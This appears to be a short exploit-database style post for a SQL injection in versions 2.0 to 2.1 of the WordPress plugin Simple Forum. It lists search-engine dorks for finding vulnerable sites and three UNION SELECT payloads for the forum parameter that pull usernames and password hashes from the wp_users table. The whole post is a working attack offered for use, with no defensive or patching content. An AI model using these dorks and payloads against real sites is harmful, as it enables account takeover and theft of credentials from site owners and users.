Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection
DORKS 1
Simple Forum - Version 2.0 (Build 207)
Simple Forum - Sürüm 2.1 (Build 228)
Simple Forum - Version 2.1 (Build 236) DORK 2 : allinurl: sf-forum?forum
sf-forum?forum=
exploit 1 :
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0, 0,0,0/**/FROM/**/wp_users/*
exploit 3 :
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0, 0,0,1/**/FROM/**/wp_users/*